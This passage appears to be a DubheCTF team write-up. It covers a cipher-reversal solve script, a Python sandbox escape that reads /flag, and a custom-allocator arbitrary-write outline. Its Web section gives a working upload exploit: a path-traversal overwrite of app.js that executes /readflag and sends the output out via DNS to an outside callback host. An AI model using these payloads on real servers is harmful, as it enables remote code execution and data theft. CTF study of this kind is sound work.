           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x33,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x33,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x43,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x31,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x33,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x44,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x43,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x33,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x42,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x44,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x33,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x46,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x38,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x46,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x33,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x46,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x41,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x41,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x39,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x42,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x44,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x43,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x46,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x46,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x35,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x44,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x30,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x31,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x31,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x38,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x41,0x35,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x32,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x31,0x32,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x45,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x34,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x42,0x30,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x39,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x39,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x39,0x36,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x45,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x36,0x35,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x42,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x46,0x31,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x30,0x39,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x35,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x36,0x45,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x36,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x38,0x34,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x31,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x46,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,
           0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x41,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,
           0xf,0x0,0x0,0x0,0x44,0x43,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,
           0x0,0x0,0x34,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,
           0x32,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x37,0x39,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x45,0x45,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x35,0x46,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x45,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x44,0x37,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x43,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x33,0x39,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x0,0x0,0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x34,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,
           0x2,0x0,0x0,0x0,0xf,0x0,0x0,0x0,0x3a,0x5c,0xb8,0x75,0x28,0xf2,0xb7,0x0,0xa8,0x2f,0xa,0x0,0x8d,0x1,0x0,]
def jud(aa):
    # Convert one ASCII hex digit ('0'-'9' or 'A'-'F') to its 4-bit value.
    if aa<0x40:
        return aa-0x30
    else:
        return aa-0x37
def find_map(keyy):
    # Table lookup: substitute each byte of the 32-bit word through the dump above.
    # Each table entry is 24 bytes wide and starts with the two ASCII hex digits
    # of the substituted byte; the entry index is 16*high_nibble + low_nibble.
    result=0
    for i in range(0,8,2):
        result=(result<<8)
        cnt1=(keyy >> 4*(7-i) & 0xf)
        cnt2=(keyy >> 4*(7-i-1) & 0xf)
        result=result|((jud(map[8*(48*cnt1+3*cnt2)])<<4)|jud(map[8*(48*cnt1+3*cnt2)+1]))
    return result

def left(k):
    # Shift step: XOR the word with itself rotated left by 24, 18, 10 and 2 bits.
    tempa = ((k >> 8) & 0xffffffff) | ((k << 24) & 0xffffffff)
    tempb = ((k >> 14) & 0xffffffff) | ((k << 18) & 0xffffffff)
    tempc = ((k >> 22) & 0xffffffff) | ((k << 10) & 0xffffffff)
    tempd = ((k >> 30) & 0xffffffff) | ((k << 2) & 0xffffffff)
    return k ^ tempd ^ tempc ^ tempa ^ tempb

# The 32 expanded round keys.
key=[0x9709FD63,0x114B4BFC,0x7184CB79,0x8A19BF94,0xA895E7A5,0xEB74D318,
     0xE96E65B4,0x8D975B69,0xC27637D1,0x985A109E,0x91787061,0x63E0EF04,
     0x16BEDE86,0xA32E8C81,0xDC88A458,0x7643DC82,0xD78059F3,0xCB301354,
     0x8408BBBE,0x2C0D5C07,0x2EA867C0,0xF8329491,0xD65718E8,0xC4E9E902,
     0xD7DE40B2,0xE97982D0,0x745D7594,0x24FDD746,0x047F97FC,0xC6AA0C4D,
     0xE93C5E6A,0x38DFE8A2,]

# Ciphertext: three blocks of four 32-bit words.
code=[0x6A61EF28,0x1A7473D6,0xB1B431D0,0x351F7E22,
      0x42CFB9D6,0xEC4E01EF,0x656D6CF5,0x20F14282,
      0x1C7061EB,0x843D5ABE,0x378B394C,0x4DC1298B,]
temp=[0x465E2F66,0x33343536,0x39303132,0x35363738]
# Load one ciphertext block into the working state; here the third (code[8..11]).
for i in range(0,4):
    temp[i]=code[i+8]
# Run the 32 rounds with the round keys in reverse order to decrypt.
for i in range(0,32):
    cntt=(temp[i+1])^temp[3+i]^temp[2+i]^key[31-i]
    cntt=find_map(cntt)
    cntt=left(cntt)
    cntt=cntt^temp[i]
    temp.append(cntt)
# The last four words printed are the decrypted block.
for i in range(len(temp)):
    print(hex(temp[i]),end=',')


# Recovered plaintext words, last block first; print them in reverse, big-endian,
# to read the flag.
aaaaa=[0xc0c0c0c,0xc0c0c0c,0xc0c0c0c,0x46554c7d,0x5f553533,0x485f3135,0x445f2433,0x4b5f344e,0x5f483030,0x7b564d54,0x65435446,0x44756268]
for i in range(0,12):
    kkk=aaaaa[11-i]
    print (chr ((kkk >> 24) & 0xff),end = '')
    print (chr ((kkk >> 16) & 0xff),end = '')
    print (chr ((kkk>>8) & 0xff),end='')
    print (chr ((kkk) & 0xff),end = '')

DubheCTF{VMT_H00K_4ND_$3H_15_U53FUL}
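
Why the exp above can reuse the encryption round for decryption, as an added example that is not part of the original writeup: in this four-word generalized Feistel structure, running the same round with the round keys in reverse order inverts the cipher, whatever the substitution table is. The table bytes and rotation amounts on the page match SM4's S-box and linear transform; `SBOX`, `ROUND_KEYS` and `SAMPLE_BLOCK` below are constructed stand-ins, not values from the challenge.

```python
MASK = 0xFFFFFFFF

# Constructed stand-in substitution table (an assumption for this example,
# not the table dumped from the challenge binary).
SBOX = [(x * 167 + 13) & 0xFF for x in range(256)]

# Constructed round keys; the real ones come from the binary's key expansion.
ROUND_KEYS = [(0x9E3779B9 * (i + 1)) & MASK for i in range(32)]

# Constructed 16-byte sample block.
SAMPLE_BLOCK = b"constructed 16B!"


def rotl32(word, n):
    """Rotate a 32-bit word left by n bits."""
    return ((word << n) | (word >> (32 - n))) & MASK


def substitute(word):
    """Byte-wise table lookup (the role find_map plays in the exp)."""
    out = 0
    for shift in (24, 16, 8, 0):
        out = (out << 8) | SBOX[(word >> shift) & 0xFF]
    return out


def mix(word):
    """Rotate-and-XOR step with the same rotation amounts as left() in the exp."""
    return (word ^ rotl32(word, 2) ^ rotl32(word, 10)
            ^ rotl32(word, 18) ^ rotl32(word, 24))


def run_rounds(block, round_keys):
    """Apply one round per key: new = x[i] ^ mix(substitute(x[i+1]^x[i+2]^x[i+3]^rk)).

    The output is the last four words in reverse order, which is what makes
    the same routine usable in both directions.
    """
    if len(block) != 4:
        raise ValueError("a block is exactly four 32-bit words")
    x = [w & MASK for w in block]
    for rk in round_keys:
        t = x[-3] ^ x[-2] ^ x[-1] ^ rk
        x.append(x[-4] ^ mix(substitute(t)))
    return x[:-5:-1]


def encrypt_block(block, round_keys):
    return run_rounds(block, round_keys)


def decrypt_block(block, round_keys):
    # Same rounds, keys reversed: each round undoes the matching encryption
    # round because XORing the same value twice cancels it.
    return run_rounds(block, list(reversed(round_keys)))


def bytes_to_words(data):
    """Split 16 bytes into four big-endian 32-bit words."""
    if len(data) != 16:
        raise ValueError("expected a 16-byte block")
    return [int.from_bytes(data[i:i + 4], "big") for i in range(0, 16, 4)]


def words_to_bytes(words):
    """Join four 32-bit words back into 16 big-endian bytes."""
    return b"".join(w.to_bytes(4, "big") for w in words)


if __name__ == "__main__":
    plain = bytes_to_words(SAMPLE_BLOCK)
    cipher = encrypt_block(plain, ROUND_KEYS)
    print("ciphertext:", [hex(w) for w in cipher])
    print("decrypted :", words_to_bytes(decrypt_block(cipher, ROUND_KEYS)))
```
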

Web

Wecat

Overwrite the JS

import requests
import io
url = "http://1.95.54.149:36209/wechatAPI/upload/once?login"
files = {'file': b"require('child_process').exec('ping `/readflag`.p0gu.callback.red')"}
data={"postfix":"/../../app.js"}
r = requests.post(url=url,files=(files),data=data)

DubheCTF{Chatting_Online_May_Cost_You_8000}

Misc

ezPythonCheckin

As long as no dangerous function is called it just works, and the output is echoed back.

with open('/flag', 'r') as f:
    flag = f.read()
    print(flag)


//base64
d2l0aCBvcGVuKCcvZmxhZycsICdyJykgYXMgZjoKICAgIGZsYWcgPSBmLnJlYWQoKQogICAgcHJpbnQoZmxhZyk=

cipher

Double-clicking to mount the image reveals flag.jpg under :\Users\Public

https://blog.csdn.net/shuaicenglou3032/article/details/131184510

E:\Users\test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Find a registration code (

One of our teammates solved it by hand and wiped out the registry; I won't say who (

Pwn

BuggyAllocator

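Chunks larger than 0x80 are allocated normally. For sizes below 0x80, depending on the state of qword_404410 and qword_404408, the allocator may allocate a block of twice 20 times the requested size.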

__int64 __fastcall sub_401586(unsigned __int64 a1, int *a2)
{
  __int64 result; // rax
  __int64 v3; // rax
  int i; // [rsp+14h] [rbp-3Ch]
  unsigned __int64 v5; // [rsp+18h] [rbp-38h]
  unsigned __int64 v6; // [rsp+20h] [rbp-30h]
  _QWORD *v7; // [rsp+28h] [rbp-28h]
  size_t v8; // [rsp+38h] [rbp-18h]
  _QWORD **v9; // [rsp+40h] [rbp-10h]
  _QWORD *v10; // [rsp+48h] [rbp-8h]

  v5 = a1 * *a2;
  v6 = qword_404410 - qword_404408;
  v7 = (_QWORD *)qword_404408;
  if ( v5 > qword_404410 - qword_404408 )
  {
    if ( v6 < a1 )
    {
      if ( v6 )
      {
        qword_404408 = qword_404410;
        v3 = sub_401BBE(v6);
        *v7 = qword_404420[v3];
        qword_404420[v3] = v7;
      }
      v8 = 2 * v5;
      for ( i = a1; i <= 128; i += 8 )
      {
        v9 = (_QWORD **)&qword_404420[sub_401BBE(i)];
        v10 = *v9;
        if ( *v9 )
        {
          *v9 = (_QWORD *)*v10;
          qword_404408 = (__int64)v10;
          qword_404410 = (__int64)v10 + i;
          return sub_401586(a1, a2);
        }
      }
      qword_404410 = 0LL;
      qword_404408 = (__int64)sub_401B44(v8);
      qword_404410 = qword_404408 + v8;
      result = sub_401586(a1, a2);
    }
    else
    {
      *a2 = v6 / a1;
      qword_404408 += a1 * *a2;
      result = (__int64)v7;
    }
  }
  else
  {
    qword_404408 += v5;
    result = (__int64)v7;
  }
  return result;
}

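Inside that block it builds a linked-list-like structure and writes content according to the addresses stored there.

The binary is built without PIE. The table starting at 0x404420 handles allocation and bookkeeping for each size class below 0x80.

We can first allocate a chunk of a suitable size to plant content. Once 19 chunks of that size class have been allocated, the address stored in the content at the 20th chunk's position gets used, which gives an arbitrary write. From there the table at 0x404420 can be attacked directly for further arbitrary writes.

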